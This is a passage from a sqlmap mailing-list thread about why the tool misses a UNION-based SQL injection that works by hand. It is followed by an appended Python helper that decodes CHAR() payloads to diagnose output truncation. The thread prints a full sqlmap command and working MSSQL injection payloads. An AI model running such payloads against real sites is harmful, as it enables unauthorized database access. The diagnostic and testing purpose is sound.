Re: [sqlmap-users] A simple injection case failing
From: Miroslav S. <mir...@gm...> - 2013-06-04 21:56:32
Hi.

That site is trimming results (seems to do it to 14 chars in length). For example, request [#32]:

ParamterOne=-4230' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(106)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(75)+CHAR(108)+CHAR(101)+CHAR(113)+CHAR(75)+CHAR(89)+CHAR(67)+CHAR(120)+CHAR(113)+CHAR(116)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(114)+CHAR(58)-- &ParameterTwo=10,11,12,35,61

can be decoded to:

ParamterOne=-4230' UNION ALL SELECT NULL,NULL,*:jug:KleqKYCxqt:hor:*-- &ParameterTwo=10,11,12,35,61

while in response there is:

:jug:KleqKYCxq

In these kinds of cases you'll need to (at least try to) exploit it manually.

Kind regards,
Miroslav Stampar

On Tue, Jun 4, 2013 at 10:47 AM, Stephen Shkardoon <ss...@ss...> wrote:
> I have a case that sqlmap seems to be acting weird about. I've run a
> 'sqlmap.py -u "myhost.com/TestFile.aspx"
> --data="ParameterOne=d&ParameterTwo=10,11,12,35,61" --dbms=mssql --hostname
> --technique=U --union-cols=3 -v 6 --flush-session --fresh-queries -t
> traffic_log.txt'
> Manually injecting with ParameterOne looking like "foo' UNION SELECT 1,2,3
> -- " works as expected. In fact, in the log, you can see it working fine in
> the case of request #32 and #36. However, sqlmap doesn't "find" this issue.
> Most of the queries seem to be doing something like "foo) UNION" instead.
> Is there a problem on my end here, or is sqlmap doing something weird or
> what?
>
> Running sqlmap/1.0-dev-3e0f747 (latest git).
>
> Thanks,
> Stephen

--
Miroslav Stampar
http://about.me/stamparm
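
The truncation described in the reply above can be confirmed from a traffic log. The following is an added example, not part of the original thread and not sqlmap's own code: it decodes the CHAR() chain in a logged request and measures how much of the marker string came back. The function names and the response body are assumptions constructed for illustration.

```python
import re

# One or more CHAR(n) terms joined by '+' (T-SQL string concatenation).
CHAR_CHAIN = re.compile(r"CHAR\(\d+\)(?:\s*\+\s*CHAR\(\d+\))*", re.IGNORECASE)
CHAR_CODE = re.compile(r"\((\d+)\)")

def _chain_text(match):
    """Text that one CHAR(n)+CHAR(n)+... chain evaluates to."""
    return "".join(chr(int(n)) for n in CHAR_CODE.findall(match.group(0)))

def decode_char_chains(payload):
    """Return the payload with every CHAR() chain replaced by its text."""
    return CHAR_CHAIN.sub(_chain_text, payload)

def extract_markers(payload):
    """Return the decoded text of each CHAR() chain in the payload."""
    return [_chain_text(m) for m in CHAR_CHAIN.finditer(payload)]

def reflected_prefix_len(marker, response):
    """Length of the longest prefix of marker that appears in response."""
    for n in range(len(marker), 0, -1):
        if marker[:n] in response:
            return n
    return 0

def diagnose(payload, response, min_prefix=4):
    """Classify each marker as 'intact', 'truncated' or 'absent'."""
    results = []
    for marker in extract_markers(payload):
        n = reflected_prefix_len(marker, response)
        if n == len(marker):
            state = "intact"
        elif n >= min_prefix:  # a short match could be coincidence
            state = "truncated"
        else:
            state = "absent"
        results.append({"marker": marker, "state": state, "reflected": n})
    return results

# Request #32 as quoted in the thread, rebuilt from its character codes.
CODES = [58, 106, 117, 103, 58, 75, 108, 101, 113, 75,
         89, 67, 120, 113, 116, 58, 104, 111, 114, 58]
REQUEST_32 = ("ParamterOne=-4230' UNION ALL SELECT NULL,NULL,"
              + "+".join("CHAR(%d)" % c for c in CODES)
              + "-- &ParameterTwo=10,11,12,35,61")
# Constructed response body around the value the thread reports seeing.
RESPONSE_32 = "<td>:jug:KleqKYCxq</td>"

if __name__ == "__main__":
    print(decode_char_chains(REQUEST_32))
    print(diagnose(REQUEST_32, RESPONSE_32))
```

A "truncated" result with a stable `reflected` length across several requests points to an output length limit on the page rather than a filter on the marker itself.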